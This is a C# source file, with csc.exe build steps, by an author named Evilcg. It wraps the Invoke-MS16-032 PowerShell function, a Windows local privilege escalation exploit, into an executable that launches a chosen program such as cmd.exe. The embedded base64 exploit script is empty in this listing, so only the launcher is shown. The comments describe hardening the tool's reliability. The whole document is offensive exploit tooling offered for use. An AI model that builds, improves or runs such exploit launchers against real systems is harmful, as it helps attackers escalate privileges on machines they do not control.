MS16_032 powershell to exe
/*
Author: Evilcg, Twitter: @Evilcg
Step One:
PS C:\> [psobject].Assembly.Location
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
Step Two:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:MS16_032.exe MS16_032.cs
On Windows 10 the System.Management.Automation assembly to reference may instead be found under: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35 (check [psobject].Assembly.Location as in Step One rather than assuming the path).
*/
using System;
using System.IO;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Text;
using System.Threading.Tasks;
using System.Management.Automation;
using System.Management.Automation.Host;
using System.Management.Automation.Runspaces;
namespace ConsoleApplication1
{
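class Program
{
    // Target executable and optional argument string, exactly as supplied on the command line.
    static string _application;
    static string _commandline;

    /// <summary>
    /// Entry point: drives <see cref="PowerShellExecutor"/> so the embedded Invoke-MS16-032
    /// function can be run from a plain executable. Expects one or two arguments: the
    /// program to launch and, optionally, its command line.
    /// </summary>
    /// <param name="args">Command-line arguments; args[0] is the program, args[1] its command line.</param>
    /// <returns>0 after the executor has been invoked, 1 on a usage error.</returns>
    static int Main(string[] args)
    {
        // Anything other than one or two arguments is a usage error. The original fell
        // through for three or more arguments and returned 0 without doing anything,
        // which made an operator typo look like a successful run.
        if (args.Length < 1 || args.Length > 2)
        {
            Console.WriteLine("Usage: MS16_032.exe calc.exe OR MS16_032.exe cmd.exe \"/c calc.exe\"");
            return 1;
        }

        _application = args[0];
        // With a single argument there is no command line; the executor treats "" as "omitted".
        _commandline = args.Length == 2 ? args[1] : "";

        PowerShellExecutor executor = new PowerShellExecutor();
        executor.ExecuteSynchronously(_application, _commandline);
        return 0;
    }
}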
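class PowerShellExecutor
{
    // PowerShell source that defines Invoke-MS16-032, embedded as base64. In this listing the
    // base64 string is empty, so the decoded script is "" and the function is never defined:
    // the script has to be embedded here before the wrapper can run anything.
    public static string PSInvoke_MS16_032 = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(@""));

    /// <summary>
    /// Opens a fresh runspace, loads the embedded script into it and calls
    /// Invoke-MS16-032 with the given target program and optional command line.
    /// Output is routed through Out-Default; errors collected on the error stream are
    /// written to stderr.
    /// </summary>
    /// <param name="aplication">Value for -Application (parameter name kept as-is for existing callers).</param>
    /// <param name="commandline">Value for -Commandline; "" means the parameter is omitted.</param>
    /// <exception cref="InvalidOperationException">The embedded script is empty.</exception>
    public void ExecuteSynchronously(string aplication, string commandline)
    {
        // Fail with a clear message instead of letting PowerShell report an unknown command.
        if (string.IsNullOrWhiteSpace(PSInvoke_MS16_032))
        {
            throw new InvalidOperationException("The embedded Invoke-MS16-032 script is empty; nothing to run.");
        }

        InitialSessionState iss = InitialSessionState.CreateDefault();

        // Runspace and PowerShell are IDisposable; the original disposed neither and only
        // closed the runspace on the success path.
        using (Runspace rs = RunspaceFactory.CreateRunspace(iss))
        using (PowerShell ps = PowerShell.Create())
        {
            rs.Open();
            ps.Runspace = rs;

            // Hand the arguments over as runspace variables instead of splicing them into the
            // script text. The original built the call as a string with the values wrapped in
            // double quotes, so a quote (or $(...)) inside either argument ended the string
            // early and the remainder was parsed as PowerShell.
            rs.SessionStateProxy.SetVariable("application", aplication);
            rs.SessionStateProxy.SetVariable("commandline", commandline);

            string invocation = commandline != ""
                ? "Invoke-MS16-032 -Application $application -Commandline $commandline"
                : "Invoke-MS16-032 -Application $application";

            // Echo the effective call with its actual values, as the original did.
            Console.WriteLine(commandline != ""
                ? "Invoke-MS16-032 -Application \"" + aplication + "\" -Commandline \"" + commandline + "\""
                : "Invoke-MS16-032 -Application " + aplication);

            // Function definitions first, then the call, then Out-Default for host output.
            ps.AddScript(PSInvoke_MS16_032);
            ps.AddScript(invocation);
            ps.AddCommand("Out-Default");
            ps.Invoke();

            // Non-terminating errors are collected on the error stream rather than thrown;
            // print them so a failed invocation does not silently look like success.
            foreach (ErrorRecord error in ps.Streams.Error)
            {
                Console.Error.WriteLine(error.ToString());
            }
        }
    }
}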
}